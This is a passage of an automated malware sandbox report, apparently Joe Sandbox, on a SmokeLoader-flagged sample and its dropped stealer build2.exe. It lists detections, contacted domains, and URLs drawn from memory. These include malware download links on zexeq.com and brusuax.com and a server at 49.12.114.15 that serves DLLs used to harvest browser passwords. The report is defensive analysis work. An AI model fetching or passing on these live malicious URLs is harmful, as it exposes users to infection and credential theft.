name or module or function) 44->123 125 Tries to harvest and steal browser information (history, passwords, etc) 44->125 file20 signatures21

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          E0tabE4K4r.exe89%ReversingLabsWin32.Trojan.SmokeLoader
          E0tabE4K4r.exe100%AviraTR/AD.InstaBot.yzesy
          E0tabE4K4r.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe100%AviraTR/AD.InstaBot.yzesy
          C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe89%ReversingLabsWin32.Trojan.SmokeLoader
          C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe38%ReversingLabsWin32.Trojan.Generic
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\sqlite3[1].dll0%ReversingLabs
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\build2[1].exe38%ReversingLabsWin32.Trojan.Generic

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://zexeq.com/files/1/build3.exe$run100%URL Reputationmalware
          http://www.wikipedia.com/0%URL Reputationsafe
          https://49.12.114.15:10220/mozglue.dll0%Avira URL Cloudsafe
          https://49.12.114.15:10220/nss3.dllft0%Avira URL Cloudsafe
          https://49.12.114.15:10220/vcruntime140.dllUser0%Avira URL Cloudsafe
          https://we.tl/t-99MNqXMrF0%Avira URL Cloudsafe
          https://49.12.114.15:10220/y-0%Avira URL Cloudsafe
          https://49.12.114.15/ramData0%Avira URL Cloudsafe
          https://49.12.114.15:10220/freebl3.dllO0%Avira URL Cloudsafe
          https://49.12.114.15:10220/mozglue.dllEdge0%Avira URL Cloudsafe
          https://49.12.114.15:10220/softokn3.dll0%Avira URL Cloudsafe
          https://49.12.114.15:10220/ng0%Avira URL Cloudsafe
          https://49.12.114.15:10220/0%Avira URL Cloudsafe
          http://zexeq.com/files/1/build3.exe$runl100%Avira URL Cloudmalware
          https://we.tl/t-99MNqXMr0%Avira URL Cloudsafe
          https://49.12.114.15:10220/freebl3.dllftware0%Avira URL Cloudsafe
          http://zexeq.com/test1/get.phpMh100%Avira URL Cloudmalware
          http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F_g100%Avira URL Cloudmalware
          http://zexeq.com/test1/get.php100%Avira URL Cloudmalware
          http://zexeq.com/files/1/build3.exeL100%Avira URL Cloudmalware
          http://brusuax.com/dl/build2.exe100%Avira URL Cloudmalware
          http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=trueb100%Avira URL Cloudmalware
          https://49.12.114.15:10220/50%Avira URL Cloudsafe
          https://49.12.114.15:10220/otti0%Avira URL Cloudsafe
          http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F100%Avira URL Cloudmalware
          https://49.12.114.15:10220l0%Avira URL Cloudsafe
          https://49.12.114.15:10220/(;0%Avira URL Cloudsafe
          https://49.12.114.15:10220/vcruntime140.dll0%Avira URL Cloudsafe
          https://49.12.114.15:10220/F0%Avira URL Cloudsafe
          https://49.12.114.15:10220inux0%Avira URL Cloudsafe
          https://49.12.114.15:10220461c2le0%Avira URL Cloudsafe
          https://49.12.114.15:10220/freebl3.dll0%Avira URL Cloudsafe
          https://49.12.114.15:10220/msvcp140.dll0%Avira URL Cloudsafe
          https://49.12.114.15:10220/)-0%Avira URL Cloudsafe
          https://49.12.114.15:10220/msvcp140.dlldge0%Avira URL Cloudsafe
          https://49.12.114.15:10220/mozglue.dllftware0%Avira URL Cloudsafe
          http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
          https://49.12.114.15:10220/Q0%Avira URL Cloudsafe
          http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=true100%Avira URL Cloudmalware
          http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9Fwf100%Avira URL Cloudmalware
          https://49.12.114.15:10220/v0%Avira URL Cloudsafe
          https://49.12.114.15:10220/mozglue.dllBrowser0%Avira URL Cloudsafe
          https://49.12.114.15:10220/sqlite3.dll0%Avira URL Cloudsafe
          https://49.12.114.15:10220/stemCache0%Avira URL Cloudsafe
          https://49.12.114.15:10220ing0%Avira URL Cloudsafe
          http://brusuax.com/dl/build2.exe%100%Avira URL Cloudmalware
          https://49.12.114.15:10220/vcruntime140.dllc&0%Avira URL Cloudsafe
          http://zexeq.com/files/1/build3.exe0100%Avira URL Cloudmalware
          https://49.12.114.15:10220461c2nt-Disposition:0%Avira URL Cloudsafe
          https://we.tl/t-99MNqXMrdS0%Avira URL Cloudsafe
          https://49.12.114.15/0%Avira URL Cloudsafe
          https://49.12.114.15:10220/vcruntime140.dllser0%Avira URL Cloudsafe
          http://brusuax.com/dl/build2.exe$run100%Avira URL Cloudmalware
          https://49.12.114.15:10220/softokn3.dlldge0%Avira URL Cloudsafe
          https://49.12.114.15:10220/nss3.dll0%Avira URL Cloudsafe
          https://49.12.114.15:102200%Avira URL Cloudsafe
          https://49.12.114.15:10220461c2osoft0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          t.me
          		149.154.167.99
          		truefalse
            		high
            api.2ip.ua
            		172.67.139.220
            		truefalse
              		high
              zexeq.com
              		109.175.29.39
              		truetrue
                		unknown
                brusuax.com
                		211.40.39.251
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://zexeq.com/test1/get.phptrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://brusuax.com/dl/build2.exetrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9Ftrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=truetrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://api.2ip.ua/geo.jsonfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabbuild2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://assets.activity.windows.com/v1/assetsE0tabE4K4r.exe, 00000006.00000003.1534989233.00000000035A0000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://duckduckgo.com/ac/?q=build2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://api.2ip.ua/geo.jsonTnE0tabE4K4r.exe, 00000014.00000002.1490227871.00000000007C8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://49.12.114.15:10220/mozglue.dllbuild2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://49.12.114.15:10220/vcruntime140.dllUserbuild2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2485318072.00000000004DD000.00000040.00000400.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://49.12.114.15/ramDatabuild2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/privacy-sdx.win32.bundle.js.map/e3b0c4429E0tabE4K4r.exe, 00000006.00000003.1540856867.00000000035A0000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              https://49.12.114.15:10220/mozglue.dllEdgebuild2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://49.12.114.15:10220/nss3.dllftbuild2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://49.12.114.15:10220/softokn3.dllbuild2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490683848.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438413125.00000000007A9000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://we.tl/t-99MNqXMrFE0tabE4K4r.exe, 0000000D.00000002.2488321167.00000000006D4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://49.12.114.15:10220/freebl3.dllObuild2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://49.12.114.15:10220/y-build2.exe, 0000000F.00000003.1352170130.000000000078B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490683848.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438413125.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.1426795482.00000000007A9000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://we.tl/t-99MNqXMrE0tabE4K4r.exe, 00000006.00000002.1933355848.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 0000000D.00000002.2488321167.00000000006D4000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://zexeq.com/files/1/build3.exeLE0tabE4K4r.exe, 00000006.00000002.1933355848.00000000030B0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://49.12.114.15:10220/build2.exe, 0000000F.00000003.2438055206.00000000007CA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.reddit.com/E0tabE4K4r.exe, 0000000D.00000003.1532150706.0000000003570000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                https://49.12.114.15:10220/freebl3.dllftwarebuild2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://49.12.114.15:10220/ngbuild2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steamcommunity.com/profiles/76561199601319247build2.exe, 0000000E.00000002.1337250782.0000000000800000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2485318072.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                  		high
                                  http://zexeq.com/files/1/build3.exe$runlE0tabE4K4r.exe, 00000006.00000002.1932298483.000000000075A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://steamcommunity.com/profiles/76561199601319247helloWFQY12O5J6Nr.$vbuild2.exe, 0000000E.00000002.1337250782.0000000000800000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2485318072.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		high
                                    http://zexeq.com/test1/get.phpMhE0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000659000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F_gE0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000659000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://api.2ip.ua/geo.jsonQE0tabE4K4r.exe, 00000014.00000002.1490227871.0000000000809000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://49.12.114.15:10220inuxbuild2.exe, 0000000F.00000002.2485318072.0000000000576000.00000040.00000400.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      https://api.2ip.ua/geo.jsonlE0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000618000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=build2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.2ip.ua/RE0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000659000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=truebE0tabE4K4r.exe, 00000006.00000002.1932442705.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1931541132.00000000007BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://www.ecosia.org/newtab/build2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://clients3.google.com/generate_204E0tabE4K4r.exe, 00000006.00000003.1541265236.00000000035A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://49.12.114.15:10220/ottibuild2.exe, 0000000F.00000002.2490837398.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438055206.00000000007CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://api.2ip.ua/geo.json=E0tabE4K4r.exe, 00000006.00000002.1932298483.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://49.12.114.15:10220/5build2.exe, 0000000F.00000002.2490837398.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438055206.00000000007CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://api.2ip.ua/geo.jsonXVE0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000659000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://t.me/bg3gotymedvsMozilla/5.0build2.exe, 0000000E.00000002.1337250782.0000000000800000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2485318072.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://49.12.114.15:10220/(;build2.exe, 0000000F.00000003.1426795482.00000000007CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://49.12.114.15:10220lbuild2.exe, 0000000F.00000002.2485318072.00000000004DD000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2485318072.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://www.youtube.com/E0tabE4K4r.exe, 00000006.00000003.1532235190.00000000035A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://49.12.114.15:10220461c2lebuild2.exe, 0000000F.00000002.2485318072.0000000000576000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        https://49.12.114.15:10220/vcruntime140.dllbuild2.exe, 0000000F.00000003.2438413125.00000000007A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://49.12.114.15:10220/Fbuild2.exe, 0000000F.00000003.2438055206.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490837398.00000000007ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://api.2ip.ua/geo.jsonIE0tabE4K4r.exe, 00000014.00000002.1490227871.00000000007C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://api.2ip.ua/4E0tabE4K4r.exe, 00000011.00000002.1407064334.00000000007C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://49.12.114.15:10220/freebl3.dllbuild2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://49.12.114.15:10220/msvcp140.dllbuild2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://49.12.114.15:10220/msvcp140.dlldgebuild2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://t.me/build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/react-native-community/react-native-netinfoE0tabE4K4r.exe, 00000006.00000003.1541265236.00000000035A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://49.12.114.15:10220/mozglue.dllftwarebuild2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://api.2ip.ua/geo.jsons.E0tabE4K4r.exe, 00000011.00000002.1407064334.0000000000788000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://49.12.114.15:10220/Qbuild2.exe, 0000000F.00000003.1352170130.000000000078B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://web.telegram.orgbuild2.exe, 0000000F.00000003.1347492349.000000000078B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://49.12.114.15:10220/fbuild2.exe, 0000000F.00000003.2438055206.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490837398.00000000007ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://www.amazon.com/E0tabE4K4r.exe, 0000000D.00000003.1531943324.0000000003570000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://49.12.114.15:10220/)-build2.exe, 0000000F.00000003.1352170130.000000000078B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=build2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://api.2ip.ua/geo.jsonrZE0tabE4K4r.exe, 00000011.00000002.1407064334.0000000000788000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://zexeq.com/files/1/build3.exe$runE0tabE4K4r.exe, 0000000D.00000002.2488321167.00000000006CF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                            • URL Reputation: malware
                                                                            		unknown
                                                                            http://www.twitter.com/E0tabE4K4r.exe, 00000006.00000003.1532178298.00000000035A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://api.2ip.ua/geo.jsonk/E0tabE4K4r.exe, 00000011.00000002.1407064334.0000000000788000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.openssl.org/support/faq.htmlE0tabE4K4r.exe, 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://49.12.114.15:10220/vbuild2.exe, 0000000F.00000003.2438055206.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490837398.00000000007ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/ErrorE0tabE4K4r.exe, 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000007.00000002.1281381535.0000000002280000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 0000000D.00000002.2485636228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000010.00000002.1396247343.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000011.00000002.1406738224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000013.00000002.1480789200.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		low
                                                                                  https://api.2ip.ua/geo.jsontE0tabE4K4r.exe, 00000014.00000002.1490227871.00000000007C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchbuild2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://api.2ip.ua/geo.jsonsE0tabE4K4r.exe, 00000014.00000002.1490227871.00000000007C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://t.me/jbuild2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9FwfE0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000659000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://49.12.114.15:10220/mozglue.dllBrowserbuild2.exe, 0000000F.00000002.2490837398.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438055206.00000000007CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.sqlite.org/copyright.html.build2.exe, 0000000F.00000002.2493598451.0000000003871000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2497141191.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://brusuax.com/dl/build2.exe%E0tabE4K4r.exe, 00000006.00000002.1932442705.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1931541132.00000000007A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            https://49.12.114.15:10220/vcruntime140.dllc&build2.exe, 0000000F.00000002.2490683848.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438413125.00000000007A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://49.12.114.15:10220/stemCachebuild2.exe, 0000000F.00000003.1426795482.00000000007CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.nytimes.com/E0tabE4K4r.exe, 00000006.00000003.1532113102.00000000035A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://49.12.114.15:10220ingbuild2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		low
                                                                                              https://api.2ip.ua/E0tabE4K4r.exe, 00000002.00000002.1251028778.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000002.00000003.1247643664.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000002.00000003.1246963846.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000002.1932298483.000000000075A000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000659000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000011.00000002.1407064334.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000014.00000002.1490227871.0000000000809000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://we.tl/t-99MNqXMrdSE0tabE4K4r.exe, 00000006.00000002.1933355848.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000002.1933355848.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1930812818.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 0000000D.00000002.2488321167.00000000006A9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icobuild2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://zexeq.com/files/1/build3.exe0E0tabE4K4r.exe, 00000006.00000002.1933355848.00000000030B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://49.12.114.15:10220/sqlite3.dllbuild2.exe, 0000000F.00000002.2485318072.0000000000499000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490837398.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.1426795482.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438055206.00000000007CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://49.12.114.15/build2.exe, 0000000F.00000003.1352170130.000000000078B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490683848.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438413125.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.1426795482.00000000007A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://49.12.114.15:10220461c2nt-Disposition:build2.exe, 0000000F.00000002.2485318072.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		low
                                                                                                  https://49.12.114.15:10220build2.exe, 0000000F.00000002.2485318072.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://49.12.114.15:10220461c2osoftbuild2.exe, 0000000F.00000002.2485318072.0000000000576000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		low
                                                                                                  https://ac.ecosia.org/autocomplete?q=build2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://49.12.114.15:10220/nss3.dllbuild2.exe, 0000000F.00000002.2489003715.0000000000777000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://49.12.114.15:10220/vcruntime140.dllserbuild2.exe, 0000000F.00000002.2485318072.00000000004DD000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://api.2ip.ua/geo.jsontoE0tabE4K4r.exe, 00000014.00000002.1490227871.00000000007C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
